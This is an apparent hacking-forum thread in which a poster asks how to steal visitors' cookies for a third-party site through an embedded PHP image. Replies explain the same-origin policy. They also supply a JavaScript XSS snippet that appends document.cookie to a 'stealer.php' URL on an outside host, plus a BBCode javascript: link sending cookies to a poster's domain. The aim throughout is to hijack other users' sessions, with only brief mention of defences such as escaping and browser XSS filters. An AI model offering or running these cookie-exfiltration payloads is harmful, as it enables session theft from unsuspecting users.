PHP Get Viewers' Cookies

[Dillxn]

I am able to execute a PHP page from my server on another website (website B) in the form of an image.

I want to be able to get the cookies related to website B from any users of website B who happen across my PHP image.

For example, if website B stores a cookie in user X's browser, and then user X opens a page on website B that has my PHP image on it, I want the PHP page to be able to pull that cookie.

As far as I've tried, I have thus far been unable to accomplish this task; therefore I am unsure if this is even a feasible feat.

However, if anyone could assist me, I would greatly appreciate it. Thank you.

[Bren2010]

This is known as XSS, and/or cookie-stealing. However, to bad for you, a browser will only let a website access cookies that that website set. What you want to have done is possible with other means of XSS, just not the one your trying.

[Dillxn]

Alright, before I go on a wild-goose-chase type trial-and-error session here, tell me if you think this would work (bearing in mind that XSS and most of "hacking" in general is all new to me).

I'll have the PHP page redirect the header location to a javascript url that extracts the page cookie and then opens another window with a page located on my server. The script will pass the extracted cookie to the page via querystring (and saves the data) and then the new window closes itself.

The concern I have here, is whether or not the redirect to the javascript url will occur within the image/php page or the actual root page.

So, what do you think?

And by the way, I do very much appreciate the help thus far and hopefully continued.

[Bren2010]

Alright, before I go on a wild-goose-chase type trial-and-error session here, tell me if you think this would work (bearing in mind that XSS and most of "hacking" in general is all new to me).

I'll have the PHP page redirect the header location to a javascript url that extracts the page cookie and then opens another window with a page located on my server. The script will pass the extracted cookie to the page via querystring (and saves the data) and then the new window closes itself.

The concern I have here, is whether or not the redirect to the javascript url will occur within the image/php page or the actual root page.

So, what do you think?

And by the way, I do very much appreciate the help thus far and hopefully continued.

It seems kind of. . . over the top. Tbh, I'm just gonna say I didn't understand a thing you said. If this is still all happening in the image, the php header will redirect the image source to a different page, and then you have the same problem, just more complex. It seems so much easier to do:

Code: Select all

<script type="text/javascript">
document.getElementById('image').src='http://www.google.com/stealer.php?action=GO&cookies='+document.cookie;
</script>
<image src="http://www.google.com/stealer.php?action=waitForIt" id="image" />


With a method like this, all you have to do to disarm it is to use php's htmlspecialchars(), php's addslashes(), disable javascript, and newer browsers have XSS filters. Chances are whatever site it is going to be used on is going to use the first to, and your average user is going to have the last one.

Your welcome! I'm suprised your not getting trolled, actually. . .

[Dillxn]

Ah, well yeah if I could just post javascript to the page and think it would be executed then I would have tried that
So is that really my only option? I mean, it won't work, hence the question.

And, haha, yeah I am glad I'm not getting trolled. I'm trying to to be too vague or too specific (as in what site, et caetera) in my questions.

[sanddbox]

If you want the cookies of a user browsing site A through your site B...it's not possible. Ever heard of the same origin policy? It basically says that you only send the cookies that belong to the site you're currently visiting.

@Bren - that solution won't work without an XSS vulnerability. It seems to me like the OP is trying to get the cookies of a user browsing a non-xss vulnerable page.

@OP - By the way - there are a few things you can get: the IP Address, User Agent, and HTTP Referer.

[Bren2010]

@sanddbox - Well then he's screwed, isn't he . . .?

[0xBEEF1337]

Delete.

[Bren2010]

Like: [url=javascript:window.location='http://www.bren2010.com?lulz='+document.cookie]this[/url]?

-- Fri Jul 09, 2010 10:02 pm --

Shoot, it doesn't work.

[insomaniacal]

Unless my copypasta skills totally suck, copying that into your browser won't actually do anything.